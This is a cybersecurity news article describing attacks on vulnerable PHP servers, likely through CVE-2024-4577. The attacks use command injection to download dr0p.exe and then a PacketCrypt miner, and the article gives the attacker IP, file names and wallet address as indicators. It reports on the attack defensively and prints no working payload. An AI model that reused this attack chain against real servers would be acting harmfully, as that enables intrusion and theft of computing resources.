PHP Servers Vulnerability Exploited to Mine PacketCrypt Cryptocurrency

The URL contains a command injection vulnerability, which leverages a GET parameter named “arg” to execute malicious code that attempts to download a malicious executable named “dr0p.exe” from a remote server using both curl and wget. 

If curl is unable to complete the download, it will fall back to using wget, which will then be executed locally, which is likely to render the system vulnerable.

The analysis revealed that dr0p.exe operates as a downloader, which dynamically fetches a secondary payload named pkt1.exe from a remote server with the IP address 23.27.51.244. 

This server, located in the US, exposes four open ports (22, 80, 110, and 6664) and is identified as running the EvilBit Block Explorer on port 80, suggesting that the server may be involved in cryptocurrency mining or other malicious activities, potentially leveraging the downloaded pkt1.exe for further exploitation.

Querying 23.27.51.244 on Shodan

The executable pkt1.exe initiates a child process, packetcrypt.exe, and during this process, pkt1.exe transmits a PacketCrypt (PKT Classic) wallet address (pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a) as an argument to packetcrypt.exe. 

Examination of the PKTC blockchain explorer indicates that the associated wallet has successfully mined 5 PKTC, translating to approximately 0.0021785 USDT based on current market values, which suggests that the pkt1.exe executable is likely involved in cryptocurrency mining activities specifically targeting the PacketCrypt (PKT Classic) network.

Recent web URL activity suggests exploitation of vulnerable or misconfigured PHP servers, likely leveraging CVE-2024-4577, which allows unfettered public access to php-cgi.exe, potentially enabling attackers to execute arbitrary code

It highlights the critical need for regular security audits and patching of PHP servers to address vulnerabilities like CVE-2024-4577 and mitigate risks such as crypto mining, which can significantly impact server performance.

According to the SANS, when it comes to protecting their systems from being exploited, system owners should give these security measures the highest priority.

The PacketCrypt project initially utilized a Proof-of-Work (PoW) consensus mechanism known as PKT Classic (PKTC), which allowed users to mine cryptocurrency by performing computational tasks. 

While the project later transitioned to a Stake-to-Earn (S2E) model, now simply referred to as PacketCrypt (PKT), it involved a change in the cryptocurrency associated with the project. 

Consequently, the cryptocurrency mined on vulnerable PHP servers during the investigation pertains specifically to PKTC, the cryptocurrency of the original PoW-based PacketCrypt system.

Also Read:

Kaaviya
Kaaviyahttps://cyberpress.org/
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here